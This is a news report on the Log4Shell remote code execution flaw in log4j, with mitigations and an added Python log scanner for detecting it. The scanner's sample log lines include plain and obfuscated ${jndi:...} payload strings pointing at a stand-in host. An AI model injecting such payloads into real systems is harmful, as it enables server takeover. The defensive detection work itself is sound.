The widely used Java logging library log4j is being actively exploited, according to an update from CERT NZ and Catalyst.
The library currently has an unauthenticated remote code execution (RCE) vulnerability that is triggered simply by logging a user-controlled string: log4j interprets lookup syntax such as ${jndi:...} inside the logged message and resolves it via JNDI, which can fetch and execute code from an attacker-controlled server. This can give the attacker complete control of the affected server and access to critical data.
Users have reported that the system is being actively exploited in the wild, and that proof-of-concept code has been published.
Currently, CERT NZ says systems and services that use the Apache log4j library, versions 2.0 up to and including 2.14.1, are affected. Because log4j is embedded in a very large number of Java applications and services, the exposure is broad and the entry points are many: any input that ends up in a log line, such as an HTTP header, a username or a form field, can carry the payload.
Any deployment running one of these versions should be treated as at risk. To check for exploitation attempts, search the logs of affected services for lookup strings in user-controlled fields, in particular "${jndi:", which attackers frequently obfuscate with nested lookups such as "${${lower:j}ndi:...}". User-controlled text in logs is normal on its own; it is the presence of such lookup strings that indicates an attempted, and possibly successful, compromise.
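As an added example (not code from CERT NZ, Catalyst or LunaSec), the following Python scans log lines for Log4Shell lookup strings. It first collapses the nested lower/upper/default-value lookups commonly used to disguise the payload, then matches on the resulting "${jndi:" string, and it includes a version check for the affected range named in the advisory. The log lines, IP addresses and version strings are constructed for the example.

```python
"""Added example: detect Log4Shell lookup strings in log lines, including
obfuscated variants, and classify log4j versions against the advisory range."""
import re
from typing import List, Tuple

# Constructed sample log lines (not from any real incident). Lines 0, 2 and 3
# carry payloads (plain, lower-lookup obfuscated, default-value obfuscated);
# the rest are benign and must not match.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:01:03 +1300] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:01:09 +1300] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'X-Api-Version: ${${lower:j}ndi:${lower:r}mi://198.51.100.23:1099/obj}',
    'user=alice msg=${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.23/x}',
    'user=bob msg=price is ${ 12 } dollars',
    'INFO  [main] Starting app with log4j 2.14.1, log4j2.formatMsgNoLookups=false',
]

# Innermost ${...}: a lookup whose body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation, any ${jndi:...} is the exploit payload.
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve(m):
    """Evaluate one innermost lookup the way an attacker relies on log4j doing it."""
    body = m.group(1)
    low = body.lower()
    if low.lstrip().startswith("jndi"):
        return m.group(0)                 # the payload itself: keep it for matching
    if low.startswith("lower:"):
        return body[6:].lower()           # ${lower:J} -> "j"
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${env:UNSET:-j} and ${::-j} -> "j"
        return body.split(":-", 1)[1]
    return m.group(0)                     # unknown lookup: leave untouched


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines) -> List[Tuple[int, str]]:
    """Return (line index, normalised payload) for every JNDI lookup found."""
    hits = []
    for i, line in enumerate(lines):
        for m in _JNDI.finditer(normalize_lookups(line)):
            hits.append((i, m.group(0)))
    return hits


def is_affected_version(version: str) -> bool:
    """True for log4j 2.0 through 2.14.1 inclusive, the range CERT NZ named."""
    core = version.split("-", 1)[0]       # "2.0-beta9" -> "2.0"
    parts = [int(p) for p in core.split(".")]
    parts += [0] * (3 - len(parts))
    return (2, 0, 0) <= tuple(parts[:3]) <= (2, 14, 1)


if __name__ == "__main__":
    for idx, payload in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {idx}: {payload}")
```

The normalisation step matters: a grep for the literal "${jndi:" misses the obfuscated forms on lines 2 and 3, while this scan reports all three payloads and none of the benign lines.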
CERT NZ says that the best way to prevent damage is to upgrade log4j to version 2.15.0.
Where upgrading is not immediately possible, their recommended mitigation is to set the log4j2.formatMsgNoLookups property to true by adding -Dlog4j2.formatMsgNoLookups=true to the JVM command line used to start the application (the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true has the same effect). Note that this property only exists in log4j 2.10 and later; for earlier 2.x versions the mitigation is to remove the JndiLookup class from the log4j-core jar on the classpath.
Catalyst states that it was not aware of any of its own systems, or systems it hosts, having been compromised at the time of the advisory alert.
"We have prioritised client systems according to their criticality and risk, and are patching them to mitigate the potential for the exploit," the company says.
The company has also advised that the security measures already in place are helping to limit damage and additional risk.
"Systems behind WAFs (Web Application Firewalls), like those provided by Cloudflare and Fastly, are also implementing mitigations."
Security platform LunaSec has released an update on their blog categorising it as a severe vulnerability.
"Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We're calling it 'Log4Shell' for short," they say.
Many services have already been found to be vulnerable to this exploit, among them Steam, Apple iCloud and the game Minecraft. LunaSec says that even "simply changing an iPhone's name has been shown to trigger the vulnerability in Apple's servers."
LunaSec also notes that similar vulnerabilities have been exploited before, for example in the 2017 Equifax data breach.
CERT NZ, Catalyst, LunaSec, and many other reporting agencies continue to issue advice and track the problem.